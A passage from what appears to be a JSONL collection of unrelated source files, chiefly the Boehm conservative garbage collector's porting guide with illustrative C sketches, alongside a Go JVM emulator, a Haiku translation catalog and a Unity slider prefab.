in\n APQ8016 SOC-based systems.\n Say Y if you want to use audio devices on MI2S.\n"} {"text": "const compiler = require('@dcloudio/uni-mp-weixin/lib/uni.compiler.js')\r\nmodule.exports = Object.assign({}, compiler, {\r\n directive: 'ks:'\r\n})\r\n"} {"text": "1\tenglish\tx-vnd.haiku-screenshot\t3896204963\nInclude window border\tScreenshotWindow\t\t包含窗体边框\nOverwrite\tScreenshotWindow\t\t覆盖\nSave in:\tScreenshotWindow\t\t保存到:\nThis file already exists.\\n Are you sure you would like to overwrite it?\tScreenshotWindow\t\t文件已存在。\\n 是否进行文件替换?\nSelect\tScreenshotWindow\t\t选择\nSave as:\tScreenshotWindow\t\t保存为:\nseconds\tScreenshotWindow\t\t秒\nNew screenshot\tScreenshotWindow\t\t新建屏幕截图\nScreenshot\tSystem name\t\t屏幕截图\nDesktop\tScreenshotWindow\t\t桌面\nArtwork folder\tScreenshotWindow\t\t插图文件夹\nTranslator Settings\tScreenshotWindow\t\t转换器设置\nInclude mouse pointer\tScreenshotWindow\t\t包含鼠标指针\noverwrite\tScreenshotWindow\t\t覆盖\nSettings…\tScreenshotWindow\t\t设置...\nChoose folder\tScreenshotWindow\t\t选择文件夹\nName:\tScreenshotWindow\t\t名称:\nChoose folder…\tScreenshotWindow\t\t选择文件夹…\nPlease 
select\tScreenshotWindow\t\t请选择\nCancel\tScreenshotWindow\t\t取消\nDelay:\tScreenshotWindow\t\t延迟:\nCopy to clipboard\tScreenshotWindow\t\t复制到剪贴板\nscreenshot\tScreenshot\tBase filename of screenshot files\t屏幕截图\nHome folder\tScreenshotWindow\t\t主文件夹\nSave\tScreenshotWindow\t\t保存\nCapture active window\tScreenshotWindow\t\t捕捉活动窗口\n"} {"text": "1.5 (08 Jan 2003)\n"} {"text": "/*\nCopyright 2015 The Kubernetes Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\n// Package storage contains the plumbing to setup the etcd storage of the apiserver.\npackage storage // import \"k8s.io/apiserver/pkg/server/storage\"\n"} {"text": "// go-libtor - Self-contained Tor from Go\n// Copyright (c) 2018 Péter Szilágyi. All rights reserved.\n\npackage libtor\n\n/*\n#define DSO_NONE\n#define OPENSSLDIR \"/usr/local/ssl\"\n#define ENGINESDIR \"/usr/local/lib/engines\"\n\n#include <../crypto/des/cfb64ede.c>\n*/\nimport \"C\"\n"} {"text": "module.exports = require('./wrapperValue');\n"} {"text": "package stores\n\nimport \"jvmgo/ch11/instructions/base\"\nimport \"jvmgo/ch11/rtda\"\n\n// Store double into local variable\ntype DSTORE struct{ base.Index8Instruction }\n\nfunc (self *DSTORE) Execute(frame *rtda.Frame) {\n\t_dstore(frame, uint(self.Index))\n}\n\ntype DSTORE_0 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_0) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 0)\n}\n\ntype DSTORE_1 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_1) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 1)\n}\n\ntype DSTORE_2 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_2) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 2)\n}\n\ntype DSTORE_3 struct{ base.NoOperandsInstruction }\n\nfunc (self *DSTORE_3) Execute(frame *rtda.Frame) {\n\t_dstore(frame, 3)\n}\n\nfunc _dstore(frame *rtda.Frame, index uint) {\n\tval := frame.OperandStack().PopDouble()\n\tframe.LocalVars().SetDouble(index, val)\n}\n"} {"text": "\n\n Conservative GC Porting Directions\n\n\n

Conservative GC Porting Directions

\nThe collector is designed to be relatively easy to port, but is not\nportable code per se. The collector inherently has to perform operations,\nsuch as scanning the stack(s), that are not possible in portable C code.\n

\nAll of the following assumes that the collector is being ported to a\nbyte-addressable 32- or 64-bit machine. Currently all successful ports\nto 64-bit machines involve LP64 targets. The code base includes some\nprovisions for P64 targets (notably win64), but that has not been tested.\nYou are hereby discouraged from attempting a port to non-byte-addressable,\nor 8-bit, or 16-bit machines.\n

\nThe difficulty of porting the collector varies greatly depending on the needed\nfunctionality. In the simplest case, only some small additions are needed\nfor the include/private/gcconfig.h file. This is described in the\nfollowing section. Later sections discuss some of the optional features,\nwhich typically involve more porting effort.\n

\nNote that the collector makes heavy use of ifdefs. Unlike\nsome other software projects, we have concluded repeatedly that this is preferable\nto system dependent files, with code duplicated between the files.\nHowever, to keep this manageable, we do strongly believe in indenting\nifdefs correctly (for historical reasons usually without the leading\nsharp sign). (Separate source files are of course fine if they don't result in\ncode duplication.)\n

Adding Platforms to gcconfig.h

\nIf neither thread support, nor tracing of dynamic library data is required,\nthese are often the only changes you will need to make.\n

\nThe gcconfig.h file consists of three sections:\n

    \n
  1. A section that defines GC-internal macros\nthat identify the architecture (e.g. IA64 or I386)\nand operating system (e.g. LINUX or MSWIN32).\nThis is usually done by testing predefined macros. By defining\nour own macros instead of using the predefined ones directly, we can\nimpose a bit more consistency, and somewhat isolate ourselves from\ncompiler differences.\n

    \nIt is relatively straightforward to add a new entry here. But please try\nto be consistent with the existing code. In particular, 64-bit variants\nof 32-bit architectures generally are not treated as a new architecture.\nInstead we explicitly test for 64-bit-ness in the few places in which it\nmatters. (The notable exception here is I386 and X86_64.\nThis is partially historical, and partially justified by the fact that there\nare arguably more substantial architecture and ABI differences here than\nfor RISC variants.)\n

    \nOn GNU-based systems, cpp -dM empty_source_file.c seems to generate\na set of predefined macros. On some other systems, the \"verbose\"\ncompiler option may do so, or the manual page may list them.\n(A small illustrative sketch follows this list.)\n

  2. \nA section that defines a small number of platform-specific macros, which are\nthen used directly by the collector. For simple ports, this is where most of\nthe effort is required. We describe the macros below.\n

    \nThis section contains a subsection for each architecture (enclosed in a\nsuitable ifdef). Each subsection usually contains some\narchitecture-dependent defines, followed by several sets of OS-dependent\ndefines, again enclosed in ifdefs.\n

  3. \nA section that fills in defaults for some macros left undefined in the preceding\nsection, and defines some other macros that rarely need adjustment for\nnew platforms. You will typically not have to touch these.\nIf you are porting to an OS that\nwas previously completely unsupported, it is likely that you will\nneed to add another clause to the definition of GET_MEM.\n
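\nAs an illustration of the architecture/OS recognition performed in the first\nsection (see item 1 above), a new entry might look roughly like the following.\nThe RISCV64 name and the structure shown here are illustrative assumptions,\nnot quoted from the actual gcconfig.h:\n
# if defined(__riscv) && (__riscv_xlen == 64)\n
#    define RISCV64              /* our own architecture macro (illustrative) */\n
#    ifdef __linux__\n
#      define LINUX              /* our own OS macro                          */\n
#    endif\n
# endif\n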
\nThe following macros must be defined correctly for each architecture and operating\nsystem (a combined example appears after the list below):\n
\n
MACH_TYPE\n
\nDefined to a string that represents the machine architecture. Usually\njust the macro name used to identify the architecture, but enclosed in quotes.\n
OS_TYPE\n
\nDefined to a string that represents the operating system name. Usually\njust the macro name used to identify the operating system, but enclosed in quotes.\n
CPP_WORDSZ\n
\nThe word size in bits as a constant suitable for preprocessor tests,\ni.e. without casts or sizeof expressions. Currently always defined as\neither 64 or 32. For platforms supporting both 32- and 64-bit ABIs,\nthis should be conditionally defined depending on the current ABI.\nThere is a default of 32.\n
ALIGNMENT\n
\nDefined to be the largest N, such that\nall pointers are guaranteed to be aligned on N-byte boundaries.\nDefining it to be 1 will always work, but performs poorly.\nFor all modern 32-bit platforms, this is 4. For all modern 64-bit\nplatforms, this is 8. Whether or not X86 qualifies as a modern\narchitecture here is compiler- and OS-dependent.\n
DATASTART\n
\nThe beginning of the main data segment. The collector will trace all\nmemory between DATASTART and DATAEND for root pointers.\nOn some platforms, this can be defined to a constant address,\nthough experience has shown that to be risky. Ideally the linker will\ndefine a symbol (e.g. _data) whose address is the beginning\nof the data segment. Sometimes the value can be computed using\nthe GC_SysVGetDataStart function. Not used if either\nthe next macro is defined, or if dynamic loading is supported, and the\ndynamic loading support defines a function\nGC_register_main_static_data() which returns false.\n
SEARCH_FOR_DATA_START\n
\nIf this is defined, DATASTART will be defined to a dynamically\ncomputed value which is obtained by starting with the address of\n_end and walking backwards until non-addressable memory is found.\nThis often works on Posix-like platforms. It makes it harder to debug\nclient programs, since startup involves generating and catching a\nsegmentation fault, which tends to confuse users.\n
DATAEND\n
\nSet to the end of the main data segment. Defaults to end,\nwhere that is declared as an array. This works in some cases, since\nthe linker introduces a suitable symbol.\n
DATASTART2, DATAEND2\n
\nSome platforms have two discontiguous main data segments, e.g.\nfor initialized and uninitialized data. If so, these two macros\nshould be defined to the limits of the second main data segment.\n
STACK_GROWS_UP\n
\nShould be defined if the stack (or thread stacks) grow towards higher\naddresses. (This appears to be true only on PA-RISC. If your architecture\nhas more than one stack per thread, and is not already supported, you will\nneed to do more work. Grep for \"IA64\" in the source for an example.)\n
STACKBOTTOM\n
\nDefined to be the cold end of the stack, which is usually the\nhighest address in the stack. It must bound the region of the\nstack that contains pointers into the GC heap. With thread support,\nthis must be the cold end of the main stack, which typically\ncannot be found in the same way as the other thread stacks.\nIf this is not defined and none of the following three macros\nis defined, client code must explicitly set\nGC_stackbottom to an appropriate value before calling\nGC_INIT() or any other GC_ routine.\n
LINUX_STACKBOTTOM\n
\nMay be defined instead of STACKBOTTOM.\nIf defined, then the cold end of the stack will be determined dynamically at startup.\nCurrently we usually read it from /proc.\n
HEURISTIC1\n
\nMay be defined instead of STACKBOTTOM.\nSTACK_GRAN should generally also be redefined.\nThe cold end of the stack is determined by taking an address inside\nGC_init's frame, and rounding it up to\nthe next multiple of STACK_GRAN. This works well if the stack base is\nalways aligned to a large power of two.\n(STACK_GRAN is predefined to 0x1000000, which is\nrarely optimal.)\n
HEURISTIC2\n
\nMay be defined instead of STACKBOTTOM.\nThe cold end of the stack is determined by taking an address inside\nGC_init's frame, incrementing it repeatedly\nin small steps (decrement if STACK_GROWS_UP), and reading the value\nat each location. We remember the location at which the first\nSegmentation violation or Bus error is signalled, round that\nto the nearest plausible page boundary, and use that as the\nstack base.\n
DYNAMIC_LOADING\n
\nShould be defined if dyn_load.c has been updated for this\nplatform and tracing of dynamic library roots is supported.\n
MPROTECT_VDB, PROC_VDB\n
\nMay be defined if the corresponding \"virtual dirty bit\"\nimplementation in os_dep.c is usable on this platform. This\nallows incremental/generational garbage collection.\nMPROTECT_VDB identifies modified pages by\nwrite protecting the heap and catching faults.\nPROC_VDB uses the /proc primitives to read dirty bits.\n
PREFETCH, PREFETCH_FOR_WRITE\n
\nThe collector uses PREFETCH(x) to preload the cache\nwith *x.\nThis defaults to a no-op.\n
CLEAR_DOUBLE\n
\nIf CLEAR_DOUBLE is defined, then\nCLEAR_DOUBLE(x) is used as a fast way to\nclear the two words at GC_malloc-aligned address x. By default,\nword stores of 0 are used instead.\n
HEAP_START\n
\nHEAP_START may be defined as the initial address hint for mmap-based\nallocation.\n
ALIGN_DOUBLE\n
\nShould be defined if the architecture requires double-word alignment\nof GC_malloced memory, e.g. 8-byte alignment with a\n32-bit ABI. Most modern machines are likely to require this.\nThis is no longer needed for GC7 and later.\n
\n
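\nTo make the combined example promised above concrete, a hypothetical and\ndeliberately minimal per-architecture subsection of the second gcconfig.h\nsection could look like this. Every name and value below is an illustrative\nassumption (continuing the made-up RISCV64 entry from earlier), not a\ndescription of any real port:\n
# ifdef RISCV64\n
#   define MACH_TYPE "RISCV64"\n
#   define CPP_WORDSZ 64\n
#   define ALIGNMENT 8\n
#   ifdef LINUX\n
#     define OS_TYPE "LINUX"\n
#     define DYNAMIC_LOADING\n
      extern int __data_start[];      /* assumed to be provided by the linker */\n
#     define DATASTART ((ptr_t)__data_start)\n
#     define LINUX_STACKBOTTOM        /* find the stack base via /proc        */\n
#   endif\n
# endif\n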

Additional requirements for a basic port

\nIn some cases, you may have to add additional platform-specific code\nto other files. A likely candidate is the implementation of\nGC_with_callee_saves_pushed in mach_dep.c.\nThis ensures that register contents that the collector must trace\nfrom are copied to the stack. Typically this can be done portably,\nbut on some platforms it may require assembly code, or just\ntweaking of conditional compilation tests.\n

\nFor GC7, if your platform supports getcontext(), then defining\nthe macro UNIX_LIKE for your OS in gcconfig.h\n(if it isn't defined there already) is likely to solve the problem.\nOtherwise, if you are using gcc, __builtin_unwind_init()\nwill be used, and should work fine. If that is not applicable either,\nthe implementation will try to use setjmp(). This will work if your\nsetjmp implementation saves all possibly pointer-valued registers\ninto the buffer, as opposed to trying to unwind the stack at\nlongjmp time. The setjmp_test test tries to determine this,\nbut often doesn't get it right.\n
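\nAs a purely illustrative sketch of the setjmp-based fallback just described\n(this is not the collector's mach_dep.c code), the idea is simply to force\nthe callee-save registers into a stack-resident buffer before scanning:\n
#include <setjmp.h>\n
\n
/* Call fn(arg) with the caller's register contents flushed onto this stack  */\n
/* frame, so that a conservative scan of the stack will see any pointers     */\n
/* they hold. Assumes setjmp() stores the raw callee-save registers in the   */\n
/* jmp_buf rather than recording unwind information.                         */\n
static void with_registers_on_stack(void (*fn)(void *), void *arg)\n
{\n
    jmp_buf regs;                 /* lives on the stack for the duration     */\n
    if (setjmp(regs) == 0)\n
        fn(arg);\n
}\n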

\nIn GC6.x versions of the collector, tracing of registers\nwas more commonly handled\nwith assembly code. In GC7, this is generally to be avoided.\n

\nMost commonly os_dep.c will not require attention, but see below.\n

Thread support

\nSupporting threads requires that the collector be able to find and suspend\nall threads potentially accessing the garbage-collected heap, and locate\nany state associated with each thread that must be traced.\n

\nThe functionality needed for thread support is generally implemented\nin one or more files specific to the particular thread interface.\nFor example, somewhat portable pthread support is implemented\nin pthread_support.c and pthread_stop_world.c.\nThe essential functionality consists of\n

\n
GC_stop_world()\n
\nStops all threads which may access the garbage collected heap, other\nthan the caller.\n
GC_start_world()\n
\nRestart other threads.\n
GC_push_all_stacks()\n
\nPush the contents of all thread stacks (or at least of pointer-containing\nregions in the thread stacks) onto the mark stack.\n
\nThese very often require that the garbage collector maintain its\nown data structures to track active threads.\n

\nIn addition, LOCK and UNLOCK must be implemented\nin gc_locks.h (a minimal sketch is shown below).\n
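\nA minimal sketch of such definitions, assuming a plain pthread mutex is\nadequate as the allocation lock (which, as noted in the steps below, it may\nnot be for performance reasons). This is a hypothetical fragment, not the\nshipped gc_locks.h:\n
#include <pthread.h>\n
\n
extern pthread_mutex_t GC_allocate_ml;     /* defined once in one .c file    */\n
\n
#define LOCK()   pthread_mutex_lock(&GC_allocate_ml)\n
#define UNLOCK() pthread_mutex_unlock(&GC_allocate_ml)\n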

\nThe easiest case is probably a new pthreads platform\non which threads can be stopped\nwith signals. In this case, the changes involve:\n

    \n
  1. Introducing a suitable GC_X_THREADS macro, which should\nbe automatically defined by gc_config_macros.h in the right cases.\nIt should also result in a definition of GC_PTHREADS, as for the\nexisting cases.\n
  2. For GC7+, ensuring that the atomic_ops package at least\nminimally supports the platform.\nIf incremental GC is needed, or if pthread locks don't\nperform adequately as the allocation lock, you will probably need to\nensure that a sufficient atomic_ops port\nexists for the platform to provide an atomic test-and-set\noperation. (Current GC7 versions require more atomic_ops\nsupport than necessary. This is a bug.) For earlier versions define\nGC_test_and_set in gc_locks.h.\n
  3. Making any needed adjustments to pthread_stop_world.c and\npthread_support.c. Ideally none should be needed. In fact,\nnot all of this is as well standardized as one would like, and outright\nbugs requiring workarounds are common.\n
\nNon-preemptive threads packages will probably require further work. Similarly,\nthread-local allocation and parallel marking require further work\nin pthread_support.c, and may require better atomic_ops\nsupport.\n
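\nTo make the signal-based approach concrete, here is a heavily condensed\noutline of a stop-the-world mechanism. The signal numbers, the omitted thread\nlist, and the handshake details are simplifying assumptions; the real\npthread_stop_world.c is considerably more careful:\n
#include <pthread.h>\n
#include <signal.h>\n
#include <semaphore.h>\n
\n
#define SIG_SUSPEND SIGUSR1        /* assumed unused by the client program   */\n
#define SIG_RESTART SIGUSR2\n
\n
static sem_t GC_suspend_ack;       /* one post per thread that has stopped   */\n
\n
/* Both handlers are assumed to be installed with sigaction() during GC      */\n
/* initialization (omitted here).                                            */\n
static void GC_restart_handler(int sig) { (void)sig; }\n
\n
static void GC_suspend_handler(int sig)\n
{\n
    sigset_t mask;\n
    (void)sig;\n
    /* The signal frame has already pushed this thread's registers onto its  */\n
    /* stack, so a conservative scan of the stack will see them.             */\n
    sem_post(&GC_suspend_ack);\n
    sigfillset(&mask);\n
    sigdelset(&mask, SIG_RESTART);\n
    sigsuspend(&mask);             /* real code loops on a per-thread flag   */\n
}\n
\n
void GC_stop_world(void)\n
{\n
    /* For every registered thread t other than the caller (thread           */\n
    /* registration is omitted here): pthread_kill(t, SIG_SUSPEND);          */\n
    /* then sem_wait(&GC_suspend_ack) once per signalled thread.             */\n
}\n
\n
void GC_start_world(void)\n
{\n
    /* pthread_kill(t, SIG_RESTART) for every suspended thread t.            */\n
}\n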

Dynamic library support

\nSo long as DATASTART and DATAEND are defined correctly,\nthe collector will trace memory reachable from file scope or static\nvariables defined as part of the main executable. This is sufficient\nif either the program is statically linked, or if pointers to the\ngarbage-collected heap are never stored in non-stack variables\ndefined in dynamic libraries.\n

\nIf dynamic library data sections must also be traced, then\n

    \n
  • DYNAMIC_LOADING must be defined in the appropriate section\nof gcconfig.h.\n
  • An appropriate version of the function\nGC_register_dynamic_libraries() should be defined in\ndyn_load.c. This function should invoke\nGC_cond_add_roots(region_start, region_end, TRUE)\non each dynamic library data section (see the sketch after this list).\n
\n
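\nOn ELF systems with a glibc-style loader, one reasonably safe way to walk the\nlinker's own data structures is dl_iterate_phdr(). The sketch below is\nillustrative, not the shipped dyn_load.c; it assumes the three-argument\nGC_cond_add_roots() form quoted above, and TRUE, are available from the\ncollector's own headers:\n
#define _GNU_SOURCE\n
#include <link.h>\n
\n
/* Invoked once per loaded object: register every writable PT_LOAD segment   */\n
/* as a root region.                                                          */\n
static int GC_register_one_object(struct dl_phdr_info *info, size_t size,\n
                                  void *data)\n
{\n
    int i;\n
    (void)size; (void)data;\n
    for (i = 0; i < info->dlpi_phnum; i++) {\n
        const ElfW(Phdr) *p = &info->dlpi_phdr[i];\n
        if (p->p_type == PT_LOAD && (p->p_flags & PF_W) != 0) {\n
            char *start = (char *)(info->dlpi_addr + p->p_vaddr);\n
            GC_cond_add_roots(start, start + p->p_memsz, TRUE);\n
        }\n
    }\n
    return 0;                      /* keep iterating over remaining objects  */\n
}\n
\n
void GC_register_dynamic_libraries(void)\n
{\n
    dl_iterate_phdr(GC_register_one_object, 0);\n
}\n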

\nImplementations that scan for writable data segments are error prone, particularly\nin the presence of threads. They frequently result in race conditions\nwhen threads exit and stacks disappear. They may also accidentally trace\nlarge regions of graphics memory, or mapped files. On at least\none occasion they have been known to try to trace device memory that\ncould not safely be read in the manner the GC wanted to read it.\n

\nIt is usually safer to walk the dynamic linker data structure, especially\nif the linker exports an interface to do so. But beware of poorly documented\nlocking behavior in this case.\n

Incremental GC support

\nFor incremental and generational collection to work, os_dep.c\nmust contain a suitable \"virtual dirty bit\" implementation, which\nallows the collector to track which heap pages (assumed to be\na multiple of the collector's block size) have been written during\na certain time interval. The collector provides several\nimplementations, which might be adapted. The default\n(DEFAULT_VDB) is a placeholder which treats all pages\nas having been written. This ensures correctness, but renders\nincremental and generational collection essentially useless.\n
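\nThe idea behind an MPROTECT_VDB-style implementation can be illustrated in\nisolation as follows. Page-size discovery, heap-range checks, handler\ninstallation via sigaction(), and re-protecting pages before the next\ncollection are all omitted or simplified; none of this is the actual\nos_dep.c code:\n
#include <signal.h>\n
#include <stddef.h>\n
#include <stdint.h>\n
#include <sys/mman.h>\n
\n
#define GC_PAGE_SIZE 4096u                 /* assumed; real code queries it  */\n
static unsigned char GC_dirty_pages[1u << 16];   /* toy dirty-page table     */\n
\n
/* SIGSEGV handler for write faults on the protected heap: record the page   */\n
/* as dirty, then make it writable again so the faulting store can proceed.  */\n
static void GC_write_fault_handler(int sig, siginfo_t *si, void *ctx)\n
{\n
    uintptr_t page = (uintptr_t)si->si_addr & ~(uintptr_t)(GC_PAGE_SIZE - 1);\n
    (void)sig; (void)ctx;\n
    GC_dirty_pages[(page / GC_PAGE_SIZE) % (1u << 16)] = 1;\n
    mprotect((void *)page, GC_PAGE_SIZE, PROT_READ | PROT_WRITE);\n
}\n
\n
/* Before each incremental collection cycle, write-protect the heap so that  */\n
/* subsequent stores are trapped and recorded by the handler above.          */\n
static void GC_protect_heap(void *heap_start, size_t heap_bytes)\n
{\n
    mprotect(heap_start, heap_bytes, PROT_READ);\n
}\n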

Stack traces for debug support

\nIf stack traces in objects are needed for debug support,\nGC_save_callers and GC_print_callers must be\nimplemented.\n

Disclaimer

\nThis is an initial pass at porting guidelines. Some things\nhave no doubt been overlooked.\n\n\n"} {"text": "%YAML 1.1\n%TAG !u! tag:unity3d.com,2011:\n--- !u!1 &127278\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22458224}\n - component: {fileID: 22204108}\n - component: {fileID: 11446796}\n - component: {fileID: 11406834}\n m_Layer: 5\n m_Name: HandleShadow\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &134094\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22428218}\n - component: {fileID: 22269208}\n - component: {fileID: 11438712}\n m_Layer: 5\n m_Name: Fill\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &134108\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22490904}\n - component: {fileID: 11475534}\n - component: {fileID: 22254268}\n - component: {fileID: 11491604}\n - component: {fileID: 11498930}\n - component: {fileID: 8294126}\n - component: {fileID: 11498694}\n - component: {fileID: 11406732}\n m_Layer: 5\n m_Name: Slider\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &171538\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22438182}\n - component: {fileID: 22299814}\n - component: {fileID: 11475722}\n m_Layer: 5\n m_Name: Background\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &172600\nGameObject:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22407934}\n - component: {fileID: 22265642}\n - component: {fileID: 11427430}\n - component: {fileID: 8255302}\n m_Layer: 5\n m_Name: Handle\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &178996\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22471362}\n m_Layer: 5\n m_Name: Handle Slide Area\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!1 &195914\nGameObject:\n m_ObjectHideFlags: 0\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n serializedVersion: 5\n m_Component:\n - component: {fileID: 22443340}\n - component: {fileID: 11402230}\n - component: {fileID: 22274596}\n - component: {fileID: 11447180}\n m_Layer: 5\n m_Name: Fill Area\n m_TagString: Untagged\n m_Icon: {fileID: 0}\n m_NavMeshLayer: 0\n m_StaticEditorFlags: 0\n m_IsActive: 1\n--- !u!82 &8255302\nAudioSource:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 172600}\n m_Enabled: 1\n serializedVersion: 4\n OutputAudioMixerGroup: {fileID: 0}\n m_audioClip: {fileID: 8300000, guid: 8e6c730d6464e37459410b383be0a610, type: 3}\n 
m_PlayOnAwake: 0\n m_Volume: 1\n m_Pitch: 1\n Loop: 1\n Mute: 0\n Spatialize: 0\n SpatializePostEffects: 0\n Priority: 128\n DopplerLevel: 1\n MinDistance: 1\n MaxDistance: 500\n Pan2D: 0\n rolloffMode: 0\n BypassEffects: 0\n BypassListenerEffects: 0\n BypassReverbZones: 0\n rolloffCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n - serializedVersion: 2\n time: 1\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n panLevelCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n spreadCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n reverbZoneMixCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n--- !u!82 &8294126\nAudioSource:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n serializedVersion: 4\n OutputAudioMixerGroup: {fileID: 0}\n m_audioClip: {fileID: 8300000, guid: 5f36a7cd636bd6f409db8c8d7b07109d, type: 3}\n m_PlayOnAwake: 0\n m_Volume: 1\n m_Pitch: 1\n Loop: 0\n Mute: 0\n Spatialize: 0\n SpatializePostEffects: 0\n Priority: 128\n DopplerLevel: 1\n MinDistance: 1\n MaxDistance: 500\n Pan2D: 0\n rolloffMode: 0\n BypassEffects: 0\n BypassListenerEffects: 0\n BypassReverbZones: 0\n rolloffCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n - serializedVersion: 2\n time: 1\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n panLevelCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n spreadCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 0\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 4\n reverbZoneMixCustomCurve:\n serializedVersion: 2\n m_Curve:\n - serializedVersion: 2\n time: 0\n value: 1\n inSlope: 0\n outSlope: 0\n tangentMode: 0\n m_PreInfinity: 2\n m_PostInfinity: 2\n m_RotationOrder: 0\n--- !u!114 &11402230\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 195914}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: -1200242548, guid: f5f67c52d1564df4a8936ccd202a3bd8, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n m_ShowMaskGraphic: 0\n--- !u!114 &11406732\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 100100000}\n m_GameObject: {fileID: 134108}\n m_Enabled: 1\n m_EditorHideFlags: 0\n m_Script: {fileID: 11500000, guid: a6124de87eead3d43a9f23cd33163506, type: 3}\n m_Name: \n m_EditorClassIdentifier: \n source: {fileID: 8255302}\n--- !u!114 &11406834\nMonoBehaviour:\n m_ObjectHideFlags: 1\n m_PrefabParentObject: {fileID: 0}\n m_PrefabInternal: {fileID: 
